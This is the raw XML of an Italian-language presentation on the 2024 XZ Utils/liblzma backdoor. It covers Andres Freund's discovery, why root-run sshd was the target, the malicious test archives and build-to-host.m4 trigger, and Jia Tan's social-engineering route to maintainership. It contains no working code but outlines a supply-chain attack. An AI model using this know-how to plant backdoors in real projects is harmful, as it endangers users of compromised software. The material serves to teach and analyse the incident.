              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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21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48474"/>
            <a:ext cx="11866844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SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r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 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r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?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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  <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Nelle giuste condizioni, è quindi possibile una dipendenza indiretta tra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sshd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 e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liblzma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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Quindi, ricapitolando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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liblzma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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 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è il vettore d'attacco;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Il servizio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sshd.service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 è l'obiettivo interessato dall'iniezione di codice eseguibile.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2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86851EF7-7415-C6A9-2955-1E03D0AF4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82" y="3329584"/>
            <a:ext cx="10298999" cy="101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13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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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22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48474"/>
            <a:ext cx="11866844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latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Perché </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> come target?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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  <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Il protocollo SSH consente la connessione di un utente remoto, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>purchè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> autorizzato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="240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  <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Quando eseguito come service, cioè integrato con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> è istanziato di default come processo privilegiato, appartenente allo user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> (UID=0). In altre parole, ciò significa che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>qualsiasi cosa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> venga eseguita all'interno del processo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> possiede il livello più alto di autorizzazioni sul sistema.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1794606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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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23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Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Perché SSH va in overhead?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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  <a:latin typeface="Trade Gothic Next Cond"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Non sembra chiaro cosa tenga impegnato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sshd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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 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(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quando integrato con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>systemd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) circa 1,7 volte in più rispetto al solito. Andres Freund procede quindi con analisi più dettagliate, una sessione di reverse engineering con strumenti come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gdb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 per ispezionare più nel profondo il funzionamento di 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sshd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 con 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liblzma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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Notando comportamenti strani nel caricamento e nella risoluzione dei simboli per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>liblzma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 versione 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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>5.6.0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 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>5.6.1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, invia una segnalazione discreta a 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security@debian.org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, presumendo una compromissione nel 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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>branch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 downstream di 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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Debian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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Dopo ulteriori analisi, risulterà chiaro che il pericolo è arrivato dal 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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>branch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Courier New"/>
              </a:rPr>
              <a:t> upstream.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1717257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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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24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Gli artefatti chiave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Risalendo i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, è possibile vedere gli artefatti necessari per l'installazione della backdoor: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Due file compressi in  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/test/files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, folder presente sia in upstream che in downstream:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad-3-corrupt_lzma2.xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Un trigger presente nelle release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarballs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>build-to-host.m4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, presente solo in downstream.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Sull'upstream presso GitHub, l'autore dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che contengono questi artefatti è l'utente JiaT75, uno dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, conosciuto con lo pseudonimo di </a:t>
            </a:r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Tan.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="911428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6" y="3300"/>
            <a:ext cx="10524739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 sommario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25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2A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="863413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Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRP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La scoperta di Andres Freund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b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Tan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Struttura della backdoor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Forme di mitigazione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Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1447295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26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Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b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9D3E76CD-347A-6F4E-40AA-68688F82E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793" y="2606442"/>
            <a:ext cx="7129607" cy="422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84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27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Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8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A5CDAF3D-9B14-306B-4CAE-48422DAD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1" y="3135613"/>
            <a:ext cx="6096000" cy="2691346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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B7B9107-160C-213B-0330-5C33CB858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309" y="2414814"/>
            <a:ext cx="550899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77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28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Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b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37705CAA-B40F-8092-4487-F47B582A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999" y="2596996"/>
            <a:ext cx="4988002" cy="409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8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29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Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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è uno sviluppatore open-source iscritto a GitHub dal 26 Gennaio 2021. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ha partecipato a diversi progetti. I più rilevanti per questo caso sono:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just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OSS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: progetto Google per supportare lo sviluppo sicuro di software libero attraverso il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> testing;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just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XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils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it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Altre partecipazioni comprendono:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just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cpp-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: documentazione tecnica per linguaggio C++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wasmtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> standalone per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebAssembly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889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789" y="-79"/>
            <a:ext cx="10514006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Introduzione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73743" y="1849693"/>
            <a:ext cx="12115185" cy="2739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Cos'è successo?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A fine Marzo 2024, il mondo open-source è stato vittima di un attacco che punta principalmente alla supply chain dell'ecosistema Linux. Più nel dettaglio, è stata eseguita l'iniezione di una backdoor utilizzando come vettore la libreria XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, adottata più in generale da diversi sistemi Unix-like quali Linux, Mac e Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT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420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30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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2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D9E0E269-4221-591C-07FA-6F321FBD0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385" y="1786366"/>
            <a:ext cx="7477633" cy="506531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4764ED6-ED53-C0E0-70AE-5FCCC4FB7B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276889" y="1993604"/>
            <a:ext cx="239232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Analisi Kaspersky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1904504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31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Social Engineering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vuole diventare parte del progetto XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils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  <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prima di ottenere un contatto con Lasse Collin, </a:t>
            </a:r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ha lavorato su diversi progetti come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libarchive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libarchive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
